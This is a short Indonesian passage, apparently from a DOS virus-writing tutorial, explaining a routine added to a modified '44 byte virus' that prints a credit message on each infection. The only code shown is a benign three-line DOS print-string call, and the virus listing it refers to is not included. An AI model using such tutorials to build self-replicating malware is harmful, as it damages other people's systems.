4.4. Rutin Cetak String
Pada listing program virus diatas dapat
dilihat, modifikasi dari virus 44 byte
Dengan tambahan rutin untuk menampilkan string :
Modification
of 44 Virus
© 2000,iwing[indovirus]
-For Educational Only –
setiap kali penularan. Disini dapat
dilihat rutin yang menampilkan pesan tadi yaitu
mulai : mov ah,09 ; Dos service 09h =
Cetak String
lea dx,msg ; dx berisi pesan yang akan dicetak
int 21h ; Dos intrupt
